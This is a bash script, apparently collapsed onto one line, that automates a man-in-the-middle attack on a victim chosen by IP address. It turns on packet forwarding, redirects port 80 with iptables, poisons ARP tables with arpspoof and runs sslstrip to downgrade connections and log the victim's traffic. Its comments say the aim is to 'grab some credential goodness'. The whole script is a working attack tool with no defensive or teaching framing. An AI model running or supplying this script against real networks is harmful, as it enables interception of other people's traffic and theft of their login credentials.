#!/bin/bash # ###################################################################### # # # For this script to run you have to have arpspoof and # # sslstrip installed on your system. # # # # SSLStrip Options: # # -w Specify file to log to (optional). # # -p Log only SSL POSTs. (default) # # -s Log all SSL traffic to and from server. # # -a Log all SSL and HTTP traffic to and from server. # # -l Port to listen on (default 10000). # # -f Substitute a lock favicon on secure requests. # # # # The default network interface is set to eth0. Please # # change this to one applicable for your system. # # # ###################################################################### # # set date and time DATE=`date +%e-%m-%y.%H:%M` # sslstip location SSLSTRIP=/path/to/sslstrip # log file save location LOGLOC=/path/to/logs # set network device eg eth0 DEVICE= clear if [ "$(whoami)" != 'root' ] ; then echo "Run as root. sudo $0" else # lets set some variables echo " Enter gateway IP" read GATEWAY echo " Enter victim IP" read VICTIM echo " Enter listening port eg.8080" read LPORT # enable packet forwarding and add entry to iptables echo 1 > /proc/sys/net/ipv4/ip_forward iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $LPORT # lets grab some packets. # use arpspoof for MiTM attack echo " Poisoning victim" xterm -e arpspoof -i $DEVICE -t $GATEWAY $VICTIM & xterm -e arpspoof -i $DEVICE -t $VICTIM $GATEWAY & # lets start ssl strip to and grab some credential goodness echo " Press ctrl+c to quit" python $SSLSTRIP/sslstrip.py -w $LOGLOC/$VICTIM-$DATE.log -l $LPORT # stop packet forwarding and remove iptables entry echo 0 > /proc/sys/net/ipv4/ip_forward iptables -t nat -D PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port $LPORT echo " Log file saved to $SSLLOG" fi exit